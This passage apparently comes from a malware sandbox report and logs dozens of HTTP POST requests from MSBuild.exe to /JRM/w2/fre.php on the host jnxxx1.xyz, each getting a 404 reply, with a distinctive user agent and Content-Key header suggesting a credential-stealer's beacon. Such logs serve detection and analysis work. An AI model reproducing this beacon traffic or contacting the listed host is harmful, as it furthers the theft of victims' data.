                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YnNEu%2B6zItX8IuIFpB3sX2430elU53UrcTDd4MzS5ywAw2%2Bh1c01vrlSa%2FhDCOcVpguSWeBGhE1od9kKJ5vm8avvGcxQRQwQU9DAhDfTg1B1p4SzmIyCwn8BSVN5"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd732672dd67180-DUS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  36192.168.2.449855104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:37.609826088 CET10794OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:38.051615000 CET10801INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:38 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=frcFsmSz9eLqp1DVxZWeJnvDypshx0cW2P0qlZGlTrsrLXaIoz0G%2BUP%2FyIe6wetkvr7ZoLRncTcJ22FjnhUX6tqAQTm2xhPfBhp8%2FuYV9PGEfVL%2Bt%2BqwpNxz6982"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd732752f244c9d-AMS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  37192.168.2.449862172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:38.999420881 CET10812OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:39.379360914 CET10817INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jORwfqXwFNxbmuKpe1R4pl8NbU7SCIWP814sCA3hPWQtfh97B%2BsfQvWZoVwl2lWmOTLBHSHR2W%2FxyqfUg6QTVB%2FEctzuq0xtpO%2FDcypOAtH%2Fbj7wZ%2Bz1HHS9Q1zq"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd7327ddf314eaa-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  38192.168.2.449870172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:40.507004023 CET10831OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:40.857378006 CET10835INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:40 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uD%2BD4Yze0VxTUApbR%2FxDZT2TQa5Vv4HyOq%2F0Rt4v0bpp8b21wzq782ujo1YzcVWKBDUpsBDq%2FJP9L3ByJREkkxSg3Xc49BlegLmVh5zlLqqKHYK76WyeRPG0Rk8Z"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd732873cb88ba5-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  39192.168.2.449874172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:42.324570894 CET10839OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:42.731487989 CET10840INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:42 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VDQouFNatucu1zUc25JJAPkbJ1N6rDWgE2bT6YjVtA0fbz8H29yPkNa3sxMkWo7ZsIG7G0NEekBE8pFECxDsiLpfOH62wqFkPeiowfve6Bz20mG7cVtwyx%2Bd8wT3"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd732929d346b3c-AMS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  4192.168.2.449774104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:25.064095974 CET1238OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:25:25.444298029 CET1239INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AYbx1EPjW8M38lBfcRioiBFm4Sb7UXA6FpLGg384JWnA%2B32O5P%2B2%2FK38UHyCe%2FlFMbNWCX7nbpLAK4pELGSnIf3LF11nYah2qFJyOBrdcs7baB2gdp%2F8T5PpvBtL"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd730afbc44695d-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  40192.168.2.449875104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:44.323355913 CET10841OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:44.712300062 CET10842INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:44 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L5mYlgtg3aQGX8qOqrc0LG96iYrZrjxPE93XWHiRGb2UO8OPopN4lmqKPrppc4VVrG05n0SPP5uN%2FWjhWPcfP%2FKo9wNQv0uUo4Peo74KPoQcIBKTXGkgHQY0yyli"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd7329f18bf690a-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  41192.168.2.449876172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:45.981353045 CET10843OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:46.338185072 CET10844INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:46 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dwmEdRgcgf0kvMZr2Lz2qxaww4m7Bp1zNcvjkZPkae7eYPGOGJxOL0H57k4VVIcB15BMq8FyBeMDB65ABBamOyFxw%2Bd4IxorIxQDJ0%2F9FWkOm53tftDmS0DhJQsu"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd732a97fe88beb-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  42192.168.2.449877104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:47.483133078 CET10845OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:48.047214031 CET10846INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZPNXWJmybJVMKYjkYgMAxW3c9LSQ8wQMUCSc19bMi6DnrXNKlwA1s7u%2FYNvo0V75U%2FwRMZHTKFmwun0xDtghg2%2B1wA4G4hXLZ%2Bb63CM27PW7sOQHFrz3dnno0gYF"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd732b2de377174-DUS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  43192.168.2.449878104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:48.973043919 CET10847OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:49.336987019 CET10848INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:49 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xoFPXs5ALdR5jISBg1Ki%2FNXGFl5I7RRePzEtwTG4bbdLmX0iHthiTGIy8wLJKk8rkq4%2FgYJS6HPoUEGyBHubNGNKOfBFZ6TA17%2FlurY7oocN1jNF226ItMo3Mkhn"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd732bc29a56931-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  44192.168.2.449879172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:50.474064112 CET10849OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:51.038902998 CET10850INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tRFYLDQVTkNoruezpRqwrYCrjMFPn0m697vbSgmdJPWynf6cXuF%2FviNjUAT8Hw0xv7diJXMOGqcLHKg%2FNSdva4tbLI6iK26N43D5XYc7z7WraDr7gshT7%2BMKdtG%2B"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd732c58ea97a48-DUS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  45192.168.2.449880172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:52.091600895 CET10851OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:53.140511036 CET10852INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:52 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MUnDKqmoP7BU4JPHDXvMuugC6IO3ewywew4l6Prxk9X7OEiPHWvkcLNcyPLiMP8v7sNsRcXbrfN0vEKUoXGUN9aiORNxADYIhvWD6R4flqV885skSjlfOUIbBUM7"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd732cfae5d716f-DUS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  46192.168.2.449881104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:55.192747116 CET10853OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:55.731466055 CET10854INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:55 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hzicuxcnLS%2BMSkxKEskQQ5ceYQwxf%2FKC9qRPX8yZUNsQh9J0T4gIIyd97oKhSjkzyTMKl2YXdbi5v0lrZ7b18fMHewRGbVJ0Wjb5lDvO5ayjdQGvf7%2FpRVsVwhS9"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd732e30efa7172-DUS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  47192.168.2.449882104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:56.736108065 CET10855OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:57.128308058 CET10856INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XNcySB%2BbH3AlRFOnjj9W1p%2BcWCYvOmEOPZE91yl%2BQs4vEIARciS4OzS%2BKPIxDXjyy8%2FWE7gszATruy9u%2FyoVu1PB1yYackPwk8DIjyvtqKhGhmkhqmg9mUxBbgZh"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd732ecbda2ede7-CDG
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  48192.168.2.449883104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:26:58.241652966 CET10856OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:26:59.003459930 CET10857INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:26:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WM4ASNvB4Ln0mNPyiiswINBAUmCLMcLm7roMUI%2BcIujOneXrI%2FKRd43s93wQ8c%2FwVzciUxQtYBhz1jRJQY%2BVhPWwcjW800JR784SfxAs3n%2FE2DGjUn3cVcEme%2BHb"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd732f61b2b7162-DUS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  49192.168.2.449885104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:27:01.355494976 CET10867OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:27:01.713457108 CET10868INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:27:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=g%2FS2%2FuaMIIInUhKJ%2FYgHpAz6SEX4fj37USrarJYEybNdUCyRtnUeb6TQ09Bz4zHLa5%2FAB4CIvYVxMzS5cqOZoPSkmNC%2BVKvjHxFhinfRM%2B7EsXuJJa2TMFf3MGtz"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd733098af14e1a-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  5192.168.2.449775104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:26.426706076 CET1329OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:25:26.838350058 CET1330INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Gj0NK4oB%2BBli7ZTUP7LAptCxJVybdnOjIg%2FBIPdc9x5ijdtMpsCm%2FmB1NxAkaTDt3fxhLrJfH1YsdlR47tKujnu%2BxLKvVlECRwGpobB%2FAU3Y5bcd2fQsumLurHOT"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd730b84e090b6f-AMS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  50192.168.2.449886172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:27:03.312330008 CET10869OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:27:03.696619987 CET10870INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:27:03 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zj5vKlV7qYaOg04ZKRfbma5DOQVCwdGd3IYqY12U9yAaHhQwg%2FlnW2MIKnT%2FdGHkKU2kiAzE%2BGQKDKmgfZE5LK7WyX1jnX6iDe7JVPTew4gBvZNgP42ICMRdAv8w"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd73315c8c0c4a4-DUS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  51192.168.2.449887172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:27:05.323353052 CET10871OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:27:05.702493906 CET10872INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:27:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6x%2BsZ007hK5hXMzMkvOiFpCThqx6wq4gq06N1P7L%2BQIcdoieDzOMZjwoob4qVVsan3LoPovO6PokmNui%2FkXbLMf5dphqX6N7W%2FYnA5likl%2BQANj%2Fq%2FECIJTUQq7M"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd733225c0b5b98-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
